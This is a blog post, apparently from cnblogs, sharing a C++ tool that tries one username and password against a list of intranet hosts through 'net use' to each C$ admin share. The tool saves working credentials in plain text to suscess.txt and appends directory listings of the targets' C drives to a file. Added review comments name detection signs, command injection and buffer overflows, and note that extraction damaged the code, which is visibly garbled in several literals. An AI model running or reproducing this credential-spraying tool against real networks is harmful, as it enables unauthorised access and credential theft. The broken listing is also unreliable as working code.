  • 内网批量测试登录机器工具,并且dir 目标机器c盘

    // Ipc.cpp : 定义控制台应用程序的入口点。
    //
    
    #include "stdafx.h"
    #include <stdio.h>
    #include <windows.h>
    #include <stdlib.h>
    
    // Argument bundle handed to the worker routine through CreateThread's LPVOID
    // parameter. main() fills all three fields from argv with unbounded strcpy.
    struct ThreadParameter{ // struct used to pass parameters
    	char Filename[MAX_PATH];   // path of the host-list file (opened with fopen in LoginCompter)
    	char szusername[MAX_PATH]; // account name placed after /u: on the net use command line
    	char szpassword[MAX_PATH]; // password, held and later logged in plain text
    };
    
    // Worker routine. For every line of the host list named in pParam it starts a
    // hidden "cmd.exe /c net use" child with the supplied account, reads the child's
    // output through an anonymous pipe and, when that output contains "successfully",
    // appends host/username/password to suscess.txt, appends a dir listing of the
    // share to savePath.txt and removes the mapping again.
    //
    // pParam: pointer to a ThreadParameter (host-list path, username, password).
    // Returns true after the list has been processed, false when CreatePipe or
    // CreateProcessA fails, and 0 (false) when the host list cannot be opened.
    //
    // NOTE(review): this listing was damaged by page extraction (string and
    // character literals are split across lines or emptied), so it does not
    // compile as shown; the code below is kept exactly as published.
    //
    // Security notes for reviewers and defenders:
    //  - The password is placed on the child's command line, so process-creation
    //    auditing that records command lines (for example Windows event 4688 with
    //    command-line logging enabled) captures host, account and password in clear.
    //  - suscess.txt keeps working credentials in plain text in the current directory.
    //  - One parent spawning a hidden cmd.exe / net use child per host with the same
    //    account, together with the matching run of network logon successes and
    //    failures on the targets, is the observable pattern of this kind of
    //    credential testing. Account lockout policy and limiting which accounts may
    //    reach administrative shares reduce its effect.
    //  - Lines of the host list are pasted unescaped into cmd.exe and system()
    //    command strings, so whoever controls the list file controls commands run
    //    on the machine executing this program.
    //  - Every sprintf here is unbounded: cmd/delcmd are MAX_PATH, savebuffer is 120
    //    and szdirPath is 1024 bytes, while readbuffer alone can hold 1023 bytes.
    bool LoginCompter(LPVOID pParam)
    {
    	FILE* fp;
    	FILE* ffp;
    	char readbuffer[1024],savebuffer[120];
    	ThreadParameter *tp = (ThreadParameter *)pParam;  // recover the typed argument struct
    	char cmd[MAX_PATH]; // command line for the net use child process
    	char delcmd[MAX_PATH]; // command line that removes the share mapping
    	char Buffer[4096]; // child output read from the pipe
    	STARTUPINFO sInfo,info; // NOTE(review): info is never used
    	PROCESS_INFORMATION pInfo;
    	SECURITY_ATTRIBUTES sa;
    	HANDLE hRead,hWrite;
    	DWORD bytesRead;
    	// Inheritable handles, so the child can receive the pipe's write end.
    	sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    	sa.lpSecurityDescriptor = NULL;
    	sa.bInheritHandle = TRUE;
    
    	fp = fopen(tp->Filename,"rb"); // open the host list
    	if (fp == NULL)
    	{
    		printf("fopen error in %s.
    ",tp->Filename);
    		return 0;
    	}
    
    	ffp = fopen("suscess.txt","a+"); // open the results file in append mode
    	if (ffp == NULL)
    	{
    		printf("save fopen file error suscess.txt .
    ");
    		fclose(ffp); // NOTE(review): ffp is NULL on this path; fp is the stream left open
    		return -1; // NOTE(review): -1 converts to true in a function returning bool
    	}
    	memset(readbuffer,0,sizeof(readbuffer)); // zero the line buffer
    	while (fgets(readbuffer,sizeof(readbuffer),fp))
    	{
    		if (!CreatePipe(&hRead,&hWrite,&sa,0)) // anonymous pipe for the child's output
    		{
    			printf("CreatePipe failed (%d)!
    ", GetLastError());
    			return false; // NOTE(review): fp and ffp are not closed on this path
    		}
    
    		// Start from this process's startup info, then hide the window and
    		// redirect the child's stdout/stderr into the pipe.
    		GetStartupInfo(&sInfo);
    		sInfo.cb = sizeof(sInfo);
    		sInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    		sInfo.wShowWindow = SW_HIDE;
    		sInfo.hStdError = hWrite;   // hand the pipe's write end to the child
    		sInfo.hStdOutput = hWrite;
    		memset(&pInfo, 0, sizeof(pInfo));
    
    		// Strips the line ending from the host entry.
    		// NOTE(review): the character literals here were damaged by extraction.
    		// As written, the test looks at index strlen-1 but the write goes to
    		// strlen-2, which presumes a two-byte line ending. confirm against the
    		// original. An empty string would index before the buffer.
    		if (readbuffer[strlen(readbuffer)-1] == '
    ')
    		{
    			readbuffer[strlen(readbuffer) -2] = '';
    		}
    
    		memset(cmd,0,sizeof(cmd));
    		memset(delcmd,0,sizeof(delcmd));
    		// Host, password and username are formatted straight into the command line:
    		// no length bound, no quoting, and the secret ends up in the process arguments.
    		sprintf(cmd,"cmd.exe /c net use %s\c$ %s /u:%s",readbuffer,tp->szpassword,tp->szusername);
    		// NOTE(review): sInfo is declared as STARTUPINFO and cast to LPSTARTUPINFOA;
    		// that only matches in a non-UNICODE build. confirm project settings.
    		if(!CreateProcessA(NULL, cmd    , NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA)&sInfo, &pInfo)) // start the child process
    		{
    			printf("CreateProcess failed (%d)!
    ", GetLastError());
    			CloseHandle(hWrite);
    			CloseHandle(hRead);
    			return false; // NOTE(review): fp and ffp are not closed on this path
    		}
    		CloseHandle(hWrite); // parent closes its copy of the write end
    
    
    		// Drain the child's output; the loop ends once a read yields 2 bytes or fewer.
    		while (1)
    		{
    			memset(Buffer,0,sizeof(Buffer));
    			memset(savebuffer,0,sizeof(savebuffer));
    			// NOTE(review): the return value is ignored, and a read that fills all
    			// 4096 bytes leaves Buffer without a terminator for strstr below.
    			ReadFile(hRead,Buffer,sizeof(Buffer),&bytesRead,NULL);
    			if (bytesRead <= 2)
    			{
    				break;
    			}
    
    			if (strstr(Buffer,"successfully"))
    			{
    				char szdirPath[1024] = {0}; // scratch buffer for the dir command
    				memset(szdirPath,0,sizeof(szdirPath)); 
    				sprintf(savebuffer,"Host:%s Username:%s Passwords:%s suscess 
    ",readbuffer,tp->szusername,tp->szpassword); // result line; savebuffer is only 120 bytes
    				fwrite(savebuffer,strlen(savebuffer),1,ffp); // plain-text credentials written to suscess.txt
    				sprintf(szdirPath,"dir %s\c$ >> savePath.txt",readbuffer); // append the directory listing to savePath.txt
    				system(szdirPath); // runs through the shell with text taken from the list file
    				sprintf(delcmd,"cmd.exe /c net use %s\c$ /del",readbuffer); // remove the share mapping
    				system(delcmd);
    			}
    		}
    		// NOTE(review): hRead, pInfo.hProcess and pInfo.hThread are not closed
    		// before the next iteration overwrites them.
    	}
    	fclose(fp);
    	fclose(ffp);
    	// Waits on the process handle of the last child only.
    	// NOTE(review): with an empty host list pInfo and hRead are uninitialised here.
    	WaitForSingleObject(pInfo.hProcess, INFINITE); // wait for the child process to exit
    	CloseHandle(hRead); // close the read end
    	return true;
    }
    
    // Entry point. Expects three arguments (host-list file, username, password),
    // copies them into a ThreadParameter, runs LoginCompter on a new thread and
    // waits for it to finish. Returns 0 on completion and -1 on a usage error or
    // when the thread-creation check fails.
    //
    // NOTE(review): the password is taken from argv, so it is visible in this
    // process's own command line to anything that records or lists process arguments.
    int main(int argc,char* argv[])
    {
    	ThreadParameter tp; // argument struct for the worker thread
    	HANDLE threadhandle;
    	if (argc < 4)
    	{
    		printf("[-]:%s Compute_list Username Password
    ",argv[0]);
    		return -1;
    	}
    	// NOTE(review): unbounded copies into MAX_PATH-sized fields; an argument of
    	// MAX_PATH characters or more overflows the struct on the stack.
    	strcpy(tp.Filename,argv[1]); // host-list path
    	strcpy(tp.szusername,argv[2]);  // username
    	strcpy(tp.szpassword,argv[3]); // password
    
    	// NOTE(review): LoginCompter is declared bool(LPVOID) and is cast to
    	// LPTHREAD_START_ROUTINE, so its return type (and possibly calling convention)
    	// does not match what the cast asserts.
    	threadhandle = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)LoginCompter,&tp,0,0); // start the worker thread
    	// NOTE(review): CreateThread reports failure with NULL, not INVALID_HANDLE_VALUE,
    	// so this check does not catch a failed thread creation.
    	if (threadhandle == INVALID_HANDLE_VALUE) // thread creation failed
    	{
    		printf("Create Thread error :%d 
    ",GetLastError()); // report and exit
    		return -1;
    	}
    	WaitForSingleObject(threadhandle,INFINITE); // wait for the worker to finish, then close the handle
    	CloseHandle(threadhandle);
    	return 0;
    }
    

      

    代码写得很弱,但是能用。如果你对这段代码有强烈的批评意见,甚至觉得恶心,还请指出来,我虚心接受批评。

  • 原文地址:https://www.cnblogs.com/killbit/p/4519284.html